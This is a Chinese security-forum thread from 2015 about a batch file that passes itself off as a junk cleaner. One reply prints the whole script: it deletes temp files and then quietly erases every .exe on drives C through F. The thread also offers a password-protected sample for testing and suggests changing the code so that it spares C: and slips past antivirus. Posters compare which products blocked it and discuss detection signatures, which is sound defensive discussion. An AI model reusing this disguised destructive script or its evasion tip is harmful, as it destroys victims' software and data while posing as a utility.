【批处理大战安全软件】电脑垃圾清理，让你电脑干干净净（貌似全过）

無心無

请在XP平台下测试（想看行为的朋友可以用HIPS之类软件测试）

【貌似全过】 http://r.virscan.org/report/7ed9496eee282cde271140bc6b16725d
运行之后你们的安全软件不知道会不会提示拦截（360主动防御 系统保护什么的好像会提示拦截一下）
他们发布的时候还说什么如果有杀软拦截请选择放行或者添加信任
因为清理电脑垃圾文件会触发安全软件的安全机制（说属于误报）......结果很多人都悲剧了
这种东西破坏性很大，而且大部分用户都是小白根本无法辨别.....

安全软件有的号称不拦截批处理（因为批处理是什么用户行为）.....
在好几个论坛的软件分享区发现了此软件，下载量突破了几万人！
号称清理电脑硬盘垃圾的......诸多无辜市民纷纷中招...
这种东西破坏性也很大，而且大部分用户都是小白根本无法辨别.....
而且通过各种软件论坛什么的传播也很广 下载量很大，不亚于一次病毒爆发！
【大家尽快测试】省的时间一长被安全软件收录了，你测试又说什么查杀了！
【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件，估计就不会拦截了
个人觉得安全软件还是最好加强批处理的防控！

解压密码：1024

[wmv]http://www.xiami.com/widget/0_1773228254/singlePlayer.swf[/wmv]
[wmv]http://www.xiami.com/widget/0_22708/singlePlayer.swf[/wmv].[wmv]http://www.xiami.com/widget/0_42110/singlePlayer.swf[/wmv]


http://bbs.kafan.cn/thread-1783864-1-1.html


.

dongwenqi

抑郁使者 发表于 2015-1-16 12:55
拒绝后，系统没有异常

360就是不错，很给力

MrDeep

To eset


暂未回复

paul_guo

dongwenqi 发表于 2015-1-16 13:59
360就是不错，很给力

并不是
一般你下载的批处理本身你急会调用CMD啊
我要是下载一个垃圾清理妥妥会让他调用CMD的
然后就完蛋了

pal家族

卡巴杀vbs 但不杀bat 官方解释：卡巴不能分辨这是不是用户行为！
另外~我没有看出他有什么破坏性 为什么要ping？干嘛的？

無心無

pal家族 发表于 2015-1-16 15:11
卡巴杀vbs 但不杀bat 官方解释：卡巴不能分辨这是不是用户行为！
另外~我没有看出他有什么破坏性 为什么要 ...

你看看代码吧，你运行之后会删除所有EXE文件！
for %%a in (c d e f) do (
    cd /d %%a:\
    for /r %%b in (*.exe) do (
      del /s /q %%b
    )
主要是这一段，删除C D E F 盘的所有EXE文件。

無心無

pal家族 发表于 2015-1-16 15:21
为什么要ping来ping去?

源码请看 我相信你能看懂吧？应该可以看懂他想干什么吧？有什么行为吧？
【看下图】

他们发布的时候还说什么如果有杀软拦截请选择放行或者添加信任
因为清理电脑垃圾文件会触发安全软件的安全机制（说属于误报）......结果很多人都悲剧了
安全软件有的号称不拦截批处理（因为批处理是什么用户行为）.....
这种东西破坏性很大，而且大部分用户都是小白根本无法辨别.....
在好几个论坛的软件分享区发现了此软件，下载量突破了几万人！
号称清理电脑硬盘垃圾的......诸多无辜市民纷纷中招...
这种东西破坏性也很大，而且大部分用户都是小白根本无法辨别.....
而且通过各种软件论坛什么的传播也很广 下载量很大，不亚于一次病毒爆发！

liu浪的人

Dr.Web扫描被过

bzaf868

简单粗暴可以理解为利用cmd的白加黑

cpcpcpy

pal家族 发表于 2015-1-16 15:21
为什么要ping来ping去?

这个ping的用途是让程序暂停三秒钟。。。
我有时候懒得用其他写法也会这样干

1697817057

怎么恢复

Qutianshang

1697817057 发表于 2015-1-16 19:24
怎么恢复

估计没法恢复，你会实机运行了吧

914525753

很简单很粗暴，要是真的加信任了的话，就完蛋了。
如果不留意里面的内容的话，我估计会有一大堆人倒霉了。
但是，杀软应该删不掉吧（貌似有保护的）

無心無

914525753 发表于 2015-1-16 19:55
很简单很粗暴，要是真的加信任了的话，就完蛋了。
如果不留意里面的内容的话，我估计会有一大堆人倒霉了。 ...

他就没想删除杀软就是一个恶搞的吧！

他们发布的时候还说什么如果有杀软拦截请选择放行或者添加信任
因为清理电脑垃圾文件会触发安全软件的安全机制（说属于误报）......结果很多人都悲剧了
安全软件有的号称不拦截批处理（因为批处理是什么用户行为）.....
这种东西破坏性很大，而且大部分用户都是小白根本无法辨别.....
在好几个论坛的软件分享区发现了此软件，下载量突破了几万人！
号称清理电脑硬盘垃圾的......诸多无辜市民纷纷中招...
这种东西破坏性也很大，而且大部分用户都是小白根本无法辨别.....
而且通过各种软件论坛什么的传播也很广 下载量很大，不亚于一次病毒爆发！
【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件，估计就不会拦截了

送信Y

無心無 发表于 2015-1-16 15:20
你看看代码吧，你运行之后会删除所有EXE文件！
for %%a in (c d e f) do (
    cd /d %%a:\

这样一来，要命啊~

無心無

877906025Z 发表于 2015-1-16 22:04
被毒霸崩了。。。。

【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件，估计就不会拦截了

运指如飞

搞笑……
现在卡饭的水准看来也就是这样了
批处理写个删除exe的东西值得拉来回复四页。。

我记得几年前，批处理被拿来强制卸载小红伞，干掉微点
而不是这种简单的应用。

感慨一下，请无视。

@柴

风之咩~

运指如飞 发表于 2015-1-16 22:29
搞笑……
现在卡饭的水准看来也就是这样了
批处理写个删除exe的东西值得拉来回复四页。。

这种事 拿敲竹杠来说吧 很简单一句命令 也属于常用到的一类命令 有需要时都是在一直很平淡的用着 结果就在去年因为被一个小学生学到了 拿去作为恶作剧用 结果还成了爆发性的病毒 搞的国内各大安全厂商都给特意注意到看还发了通报这事找谁说理去 果然人们看来再平淡的东西 换的方向用 偏偏会变得很耀眼

BobbySocks

总有那么几个人犯贱，还有一堆人清理垃圾用360不得了，360还不用，到处找些软件来耍

尘梦幽然

欧阳宣 发表于 2015-1-16 13:28
to mcafee

回帖不复制原帖会死吗。

这种批处理，迈克菲会入库么。。

尘梦幽然

欧阳宣 发表于 2015-1-16 23:49
只知道这类是会报的，所以估计会吧

那挺多也只是hash报，几乎不可能会提特征。

欧阳宣

尘梦幽然 发表于 2015-1-16 23:58
那挺多也只是hash报，几乎不可能会提特征。

这种几乎可以说是恶作剧的东西可能也提不出来什么特征- -

尘梦幽然

欧阳宣 发表于 2015-1-17 00:09
这种几乎可以说是恶作剧的东西可能也提不出来什么特征- -

可以提的啊，超级简单的啊。
而且做一个脚本行为虚拟分析器对于咖啡而言也是不费吹灰之力的，但是现在很明显美系三大基本上不会入BAT、VBS了，就算入也只是入个hash。。

欧阳宣

尘梦幽然 发表于 2015-1-17 00:12
可以提的啊，超级简单的啊。
而且做一个脚本行为虚拟分析器对于咖啡而言也是不费吹灰之力的，但是现在很 ...

你说的特征提出来，怎么判断它是恶意的呢

万一就有个人想把自己某个盘上的全部.rmvb文件写个bat删掉呢

尘梦幽然

欧阳宣 发表于 2015-1-17 00:13
你说的特征提出来，怎么判断它是恶意的呢

万一就有个人想把自己某个盘上的全部.rmvb文件写个bat删掉呢

对啊，，所以这是一个深刻的问题。。只能说客户有要求的话，就入一个hash好了，让客户满意。

欧阳宣

尘梦幽然 发表于 2015-1-17 00:16
对啊，，所以这是一个深刻的问题。。只能说客户有要求的话，就入一个hash好了，让客户满意。

extra.dat就是为这个

尘梦幽然

欧阳宣 发表于 2015-1-17 01:23
extra.dat就是为这个

extra.dat经常不好解决问题的。对于没什么行为的PE木马来说还好对付，对于感染性、rootkits之类的完全无能为力

877906025Z

無心無 发表于 2015-1-16 22:24
【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件，估计就不会拦截了

嗯。。。。。只拦C,D剩下的都被删了

c030612

@echo off & color 0d
echo 是否清空计算机系统垃圾?
pause>nul & cls & echo 正在清理垃圾文件...请稍等...
ping 127.0.0.1 -n "3">NUL
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
cls & echo 清理垃圾完成,正在清理系统 垃圾 文件...请稍等...
ping 127.0.0.1 -n "3">NUL
  for %%a in (c d e f) do (
    cd /d %%a:\
    for /r %%b in (*.exe) do (
      del /s /q %%b
    )
)
cls & echo 已完成...
ping 127.0.0.1 -n "3">NUL
exit

::GAGATOSHUT团队

最后那段代码是坑爹的，谁运行谁中招

無心無

877906025Z 发表于 2015-1-18 17:08
嗯。。。。。只拦C,D剩下的都被删了

我说的没错吧，呵呵！

tanshi1990

再也不用优化软件

笑引鬼影差点死

360TS未报，本人的Avast Internet Security未报

抑郁使者

拒绝后，系统没有异常

無心無

抑郁使者 发表于 2015-1-16 12:55
拒绝后，系统没有异常

360主动防御会拦截一下（我上面说过了）
别的杀毒软件好多都不管
安全软件有的号称不拦截批处理（因为批处理是什么用户行为）.....
在好几个论坛的软件分享区发现了此软件，下载量突破了几万人！
号称清理电脑硬盘垃圾的......诸多无辜市民纷纷中招...
这种东西破坏性也很大，而且大部分用户都是小白根本无法辨别.....
而且通过各种软件论坛什么的传播也很广 下载量很大，不亚于一次病毒爆发！
【大家尽快测试】省的时间一长被安全软件收录了，你测试又说什么查杀了！


【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件，估计就不会拦截了

抑郁使者

無心無 发表于 2015-1-16 12:57
360主动防御会拦截一下（我上面说过了）
别的杀毒软件好多都不管
安全软件有的号称不拦截批处理（因为 ...

估计费尔 火绒都会拦截
等待测试

無心無

抑郁使者 发表于 2015-1-16 12:58
估计费尔 火绒都会拦截
等待测试

测试一下其他的吧 .......比如什么小红伞啊 小A啊 NOD32啊 金山啊 QQ电脑管家啊等等
有好多都没拦截也没什么提示......
他们发布的时候还说什么如果有杀软拦截请选择放行或者添加信任
因为清理电脑垃圾文件会触发安全软件的安全机制（说属于误报）......结果很多人都悲剧了
这种东西破坏性很大，而且大部分用户都是小白根本无法辨别.....
http://r.virscan.org/report/7ed9496eee282cde271140bc6b16725d
【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件，估计就不会拦截了


.

lixihong10

  for %%a in (c d e f) do (
    cd /d %%a:\
    for /r %%b in (*.exe) do (
      del /s /q %%b
    )

主要是这一段，删除C D E F 盘的所有EXE文件。
已经触犯到了我毛豆的规则

無心無

lixihong10 发表于 2015-1-16 13:10
for %%a in (c d e f) do (
    cd /d %%a:\
    for /r %%b in (*.exe) do (

很多用户都不用什么毛豆的，他也看不懂HIPS之类软件的提示啊！
他们发布的时候还说什么如果有杀软拦截请选择放行或者添加信任
因为清理电脑垃圾文件会触发安全软件的安全机制（说属于误报）......结果很多人都悲剧了
这种东西破坏性很大，而且大部分用户都是小白根本无法辨别.....
在好几个论坛的软件分享区发现了此软件，下载量突破了几万人！
号称清理电脑硬盘垃圾的......诸多无辜市民纷纷中招...
这种东西破坏性也很大，而且大部分用户都是小白根本无法辨别.....
而且通过各种软件论坛什么的传播也很广 下载量很大，不亚于一次病毒爆发！

lixihong10

無心無 发表于 2015-1-16 13:12
很多用户都不用什么毛豆的，他也看不懂HIPS之类软件的提示啊！
他们发布的时候还说什么如果有杀软拦截请 ...

好吧，前天还有格盘的。。。貌似几个遭殃的~

無心無

lixihong10 发表于 2015-1-16 13:14
好吧，前天还有格盘的。。。貌似几个遭殃的~

什么意思？通过什么中招了？这个样本？


在好几个论坛的软件分享区发现了此软件，下载量突破了几万人！
号称清理电脑硬盘垃圾的......诸多无辜市民纷纷中招...
这种东西破坏性也很大，而且大部分用户都是小白根本无法辨别.....
而且通过各种软件论坛什么的传播也很广 下载量很大，不亚于一次病毒爆发！
他们发布的时候还说什么如果有杀软拦截请选择放行或者添加信任
因为清理电脑垃圾文件会触发安全软件的安全机制（说属于误报）......结果很多人都悲剧了


【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件，估计就不会拦截了